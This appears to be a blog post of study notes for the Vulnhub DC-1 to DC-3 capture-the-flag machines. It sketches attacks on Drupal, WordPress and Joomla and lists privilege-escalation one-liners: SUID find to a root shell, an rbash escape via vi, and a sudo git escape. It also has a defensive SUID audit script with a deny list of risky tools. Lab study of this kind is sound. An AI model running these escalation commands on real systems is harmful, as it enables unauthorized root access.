Vulnhub DC Series
DC Series Learning…
dc-1
# Exploiting CMS Drupal 7 using msf
# msf > search about drupal 7 Exploits and Auxiliaries.
### Post Exploitation
[SUID Files]:-
Awesome script for SUID Exploitation ====> suid3num.py <=====
find / -type f -perm -4000 2>/dev/null   # ---> find
find . -exec /bin/sh -p \; -quit
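A defender-side counterpart to the SUID enumeration above, as an added example that is not part of the original notes: it lists SUID files under a directory and flags names that appear on a short deny list of shell-capable tools. The function names and the `RISKY_SUID` list are assumptions made for this example, and the demo runs on a constructed temporary tree.

```shell
#!/bin/sh
# Added example: SUID audit for hardening reviews.
# RISKY_SUID is a constructed, non-exhaustive deny list (assumption):
# tools that can run other commands and should not carry the setuid bit.
RISKY_SUID="find vi vim git less more nmap bash sh dash env awk python perl"

# audit_suid ROOT
# Prints one line per SUID file: "RISKY <path>" if the basename is on the
# deny list, otherwise "review <path>" (check it against the distro default).
audit_suid() {
    root=${1:-/}
    find "$root" -xdev -type f -perm -4000 2>/dev/null | sort |
    while IFS= read -r path; do
        name=$(basename "$path")
        verdict=review
        case " $RISKY_SUID " in
            *" $name "*) verdict=RISKY ;;
        esac
        printf '%s %s\n' "$verdict" "$path"
    done
}

# count_risky ROOT -> number of RISKY findings (0 when the tree is clean)
count_risky() {
    audit_suid "$1" | grep -c '^RISKY ' || true
}

# Demo on a constructed tree; no real system files are touched.
demo=$(mktemp -d)
: > "$demo/find"; : > "$demo/passwd"; : > "$demo/notes"
chmod 4755 "$demo/find" "$demo/passwd"   # constructed SUID samples
audit_suid "$demo"
echo "risky SUID files: $(count_risky "$demo")"
# Remediation for a RISKY finding: chmod u-s <path>
rm -rf "$demo"
```

On a real host, run `audit_suid /` as root and remove the setuid bit from every `RISKY` entry.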
dc-2
# Exploiting CMS --> WordPress 4.7.10
# Password file creation
cewl "$URL" -m 5 -w "$PWD/cewl.txt" 2>/dev/null
# Login brute force or user enumeration
wpscan --url "$URL" -e u -P cewl.txt
### Post Exploitation
=======================
[Escape rbash using vi]:-
=======================
:set shell=/bin/bash
# then type this and press Enter
:shell
export PATH=/bin:/usr/bin:$PATH
export SHELL=/bin/bash
===========================
Password Reuse and [sudo -l] :-
===========================
[/usr/bin/git sudo Escape]:-
sudo git help add
# Type this, then press Enter
!/bin/bash
dc-3
# Exploiting Joomla 3.7.0 Version
Explore msf usage for Joomla exploitation; get the exploit and auxiliaries used
# Raw tools used for exploitation
- nmap
- joomlacheck.sh <--- script
- nuclei <--- for cve detection
=======
nuclei -u $URL -t /root/nuclei-templates/http/cves/ -tags joomla
=======
- dirsearch <--- for directory brute force
- git poc <--- for SQL Injection Exploitation
- curl
- searchsploit
- msfconsole <-- A lot!
# Linux kernel Exploitation
------> linux kernel exploitation <-------
=> uname -a
=> file /bin/bash
=> cat /etc/*-release
This post is licensed under CC BY 4.0 by the author.
